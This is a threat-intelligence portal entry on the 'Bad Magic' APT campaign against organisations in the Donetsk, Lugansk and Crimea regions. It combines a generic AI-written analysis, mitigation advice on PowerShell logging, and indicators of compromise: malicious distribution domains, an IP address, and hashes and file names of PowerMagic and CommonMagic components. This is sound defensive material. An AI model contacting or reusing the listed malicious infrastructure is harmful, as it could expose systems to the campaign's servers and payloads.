Skip to main content

OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict

Low
Published: Wed Mar 22 2023 (03/22/2023, 00:00:00 UTC)
Source: CIRCL
Vendor/Project: type
Product: osint

Description

OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict

AI-Powered Analysis

AILast updated: 07/09/2025, 00:24:58 UTC

Technical Analysis

The reported threat concerns a newly identified Advanced Persistent Threat (APT) group operating in the context of the Russo-Ukrainian conflict. This APT, referred to as 'Bad magic,' has been detected through open-source intelligence (OSINT) efforts and is characterized by its use of PowerShell scripting (MITRE ATT&CK T1059.001) for payload delivery and network activity. The campaign appears to be focused on leveraging PowerShell to execute malicious code, which is a common technique for stealthy command and control and lateral movement within compromised networks. Although specific affected software versions or vulnerabilities are not detailed, the threat is linked to geopolitical tensions in Ukraine and surrounding regions, suggesting a targeted espionage or sabotage motive. The analysis confidence is moderate, with a threat level rated as low by the source, and no known exploits or patches are currently available. The lack of detailed technical indicators or exploits in the wild implies that the threat is either emerging or under active investigation. The campaign's use of PowerShell indicates a preference for living-off-the-land techniques, which complicates detection and mitigation efforts. Overall, this APT represents a persistent and evolving threat actor leveraging scripting and network-based tactics in a high-conflict geopolitical environment.

Potential Impact

For European organizations, especially those with ties to Ukraine or involved in sectors relevant to the Russo-Ukrainian conflict (such as government, defense, critical infrastructure, and diplomatic entities), this APT poses a risk of espionage, data exfiltration, and potential disruption of services. The use of PowerShell-based payload delivery can lead to unauthorized access, lateral movement within networks, and potential compromise of sensitive information. While the current severity is assessed as low, the geopolitical context and the persistent nature of APTs mean that the impact could escalate if the threat actor refines their capabilities or expands targeting. Organizations in Europe may face indirect risks through supply chain attacks or targeting of diaspora communities and allied institutions. The stealthy nature of PowerShell attacks also increases the risk of prolonged undetected intrusions, which can undermine confidentiality and integrity of critical data and systems.

Mitigation Recommendations

European organizations should implement advanced PowerShell logging and monitoring to detect anomalous script execution, including enabling Script Block Logging and Module Logging in Windows environments. Employ application control policies such as AppLocker or Windows Defender Application Control to restrict unauthorized PowerShell usage. Network segmentation and strict access controls can limit lateral movement opportunities. Regular threat hunting activities focusing on PowerShell command patterns and unusual network connections should be conducted. Organizations should also ensure that endpoint detection and response (EDR) solutions are tuned to identify living-off-the-land techniques. Given the geopolitical context, enhanced collaboration with national cybersecurity centers and sharing of threat intelligence related to this APT is recommended. Employee awareness training about spear-phishing and social engineering tactics commonly used to initiate such campaigns is also critical. Finally, maintaining up-to-date backups and incident response plans tailored to APT scenarios will improve resilience against potential compromises.

Need more detailed analysis?Get Pro

Technical Details

Threat Level
3
Analysis
1
Uuid
f3eda2d3-840b-46ba-ac74-50b68a58b0fe
Original Timestamp
1679481690

Indicators of Compromise

Domain

ValueDescriptionCopy
domainwebservice-srv.online
Distribution servers
domainwebservice-srv1.online
Distribution servers

Ip

ValueDescriptionCopy
ip185.166.217.184
Distribution servers

Hash

ValueDescriptionCopy
hash0a95a985e6be0918fdb4bfabf0847b5a
Lure archives
hashecb7af5771f4fe36a3065dc4d5516d84
Lure archives
hash765f45198cb8039079a28289eab761c5
Lure archives
hashebaf3c6818bfc619ca2876abd6979f6d
Lure archives
hash1032986517836a8b1f87db954722a33f
Lure archives
hash1de44e8da621cdeb62825d367693c75e
Lure archives
hash7c0e5627fd25c40374bc22035d3fadd8
hash9e19fe5c3cf3e81f347dd78cf3c2e0c2
CommonMagic cryptography module
hashce8d77af445e3a7c7e56a6ea53af8c0d
CommonMagic loader
hash1fe3a2502e330432f3cf37ca7acbffac
PowerMagic backdoor
hash8c2f5e7432f1e6ad22002991772d589b
PowerMagic loader
hashbec44b3194c78f6e858b1768c071c5db
PowerMagic dropper
hashfee3db5db8817e82b1af4cedafd2f346

File

ValueDescriptionCopy
fileOverall.exe
fileClean.exe
CommonMagic cryptography module
fileAll.exe
CommonMagic loader
filemanutil.vbs
PowerMagic loader
fileservice_pack.dat
PowerMagic dropper
fileattachment.msi

Link

ValueDescriptionCopy
linkhttps://securelist.com/bad-magic-apt/109087/

Text

ValueDescriptionCopy
textSince the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions. In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
textBlog

Threat ID: 682acdbebbaf20d303f0e64a

Added to database: 5/19/2025, 6:20:46 AM

Last enriched: 7/9/2025, 12:24:58 AM

Last updated: 8/18/2025, 10:09:00 PM

Views: 10

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

External Links

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats